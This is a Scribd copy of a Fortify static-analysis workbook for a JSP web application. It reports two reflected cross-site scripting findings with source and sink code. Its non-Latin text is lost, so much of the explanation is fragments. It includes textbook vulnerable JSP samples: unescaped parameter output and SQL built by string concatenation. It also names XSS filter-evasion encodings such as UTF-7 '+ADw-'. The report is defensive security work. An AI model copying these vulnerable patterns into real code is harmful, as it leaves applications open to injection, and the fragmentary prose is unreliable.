Scribd Logo
Upload

Welcome to Scribd!

  • Untitled

    Uploaded by

    dionysus45
    44 views7 pages

    Copyright

    © Attribution Non-Commercial (BY-NC)

    Available Formats

    PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    44 views7 pages

    Untitled

    Uploaded by

    dionysus45

    Copyright:

    Attribution Non-Commercial (BY-NC)
    Download as PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 7

    Developer Workbook 2010TW

    Aug 19, 2011


    Administrator

    Developer Workbook 2010TW

    :Aug 19, 2011 ,:VM-Fortify1 ,(BuildID):Dms0819


    :1894 ,:222921

    Issues by Folder
    Critical
    Medium
    Impact
    Low

    2
    0
    61
    1315

    Page 2 of 7

    Developer Workbook 2010TW

    Issues by Category
    Refined by: [fortify priority order]:Critical

    Cross-Site Scripting: Reflected

    Issues by Category
    Refined by: [fortify priority order]:Medium

    Page 3 of 7

    Developer Workbook 2010TW

    :(Critical)
    Category: Cross-Site Scripting: Reflected (2 Issues)
    Number of Issues
    0.00

    0.25

    0.50

    0.75

    1.00

    1.25

    1.50

    1.75

    2.00

    <Unaudited>

    Analysis

    Not an Issue
    Reliability Issue
    Bad Practice
    Suspicious
    Exploitable

    Abstract:

    Explanation:
    Cross-site Scripting (XSS)
    1. WebReflected XSS
    Persisted XSSStored XSS
    2.
    JavaScriptHTMLFlash
    XSSCookies
    Web

    1JSPHTTPID eidID
    <% String eid = request.getParameter("eid"); %>
    ...
    Employee ID: <%= eid %>
    eideid
    HTTP
    URL
    URLURL
    Web
    WebReflected XSS
    2JSPID
    <%...
    Statement stmt = conn.createStatement();
    ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
    if (rs != null) {
    rs.next();
    String name = rs.getString("name");
    %>
    Employee Name: <%= name %>

    Page 4 of 7

    Developer Workbook 2010TW


    1name
    name
    name

    Persistent XSSStored XSS


    XSS(guestbook)
    JavaScript
    XSSHTTPXSS

    - 1HTTPHTTP
    WebReflected XSS
    URL
    URL(phishing)
    URL
    Cookie
    - 2
    Persistent XSS

    Recommendations:
    XSS
    XSS
    Web
    XSS
    WebSQL Injection
    XSSXSS

    XSS

    XSSHTTP
    0-9
    Web
    HTML

    HTML
    HTML
    Carnegie Mellon (Software Engineering Institute) CERT(R) (CERT(R) Coordination
    Center) [1]
    (block-level)
    - <
    - &
    - ><

    -
    -
    -
    - &
    URL
    URL
    - URL
    - &CGI
    - ASCIIISO-8859-1128URL

    Page 5 of 7

    Developer Workbook 2010TW


    - HTTP%
    %68%65%6C%6C%6F%hello
    <SCRIPT> </SCRIPT>
    - Script
    Script
    - Script(!)(")

    - UTF-7<+ADw-
    UTF-7
    XSS

    HTML[2]ISO 8859-1
    Cross-Site ScriptingHTTP
    Cross-Site Scripting

    Tips:
    Fortify Source Code Analysis SuiteXSS
    Audit Workbench
    Foritfy RTA adds protection against this category.

    header.jsp, line 7 (Cross-Site Scripting: Reflected)


    Fortify Priority:
    Kingdom:
    Abstract:
    Source:
    5
    6
    7

    Critical
    Folder
    Critical
    Input Validation and Representation
    header.jsp_jspService()7

    header.jsp:7 javax.servlet.http.HttpServletRequest.getRemoteUser()

    8
    9

    <c:set var="now" value="<%=new java.util.Date()%>"></c:set>


    <div class="accountText right">
    Login ID: <c:out value="${ pageContext.request.remoteUser }"/><br /> Date: <fmt:formatDate value="${ now }"
    type="date" timeStyle="long" dateStyle="long" />
    </div>
    <!--<div class="link right">

    Sink:

    header.jsp:7 java.io.Writer.write()

    5
    6
    7

    <c:set var="now" value="<%=new java.util.Date()%>"></c:set>


    <div class="accountText right">
    Login ID: <c:out value="${ pageContext.request.remoteUser }"/><br /> Date: <fmt:formatDate value="${ now }"
    type="date" timeStyle="long" dateStyle="long" />
    </div>
    <!--<div class="link right">

    8
    9

    GlobalMonitorobjectList.jsp, line 63 (Cross-Site Scripting: Reflected)


    Fortify Priority:
    Kingdom:
    Abstract:
    Source:
    61
    62
    63
    64
    65

    Critical
    Folder
    Critical
    Input Validation and Representation
    GlobalMonitorobjectList.jsp_jspService()
    63
    GlobalMonitorobjectList.jsp:63 javax.servlet.ServletRequest.getParameter()
    <c:if test="${not empty param.domainSerial && domainSerial != 1}">
    <s:url action="DomainEdit_selectByKey" id="pkey">
    <s:param name="vo.domainSerial"><c:out value="${param.domainSerial}" /></s:param>
    </s:url>
    <a href="${pkey}">

    Sink:
    61

    GlobalMonitorobjectList.jsp:63 java.io.Writer.write()
    <c:if test="${not empty param.domainSerial && domainSerial != 1}">

    Page 6 of 7

    Developer Workbook 2010TW


    62
    63
    64
    65

    <s:url action="DomainEdit_selectByKey" id="pkey">


    <s:param name="vo.domainSerial"><c:out value="${param.domainSerial}" /></s:param>
    </s:url>
    <a href="${pkey}">

    :(Meduim)

    Page 7 of 7

    You might also like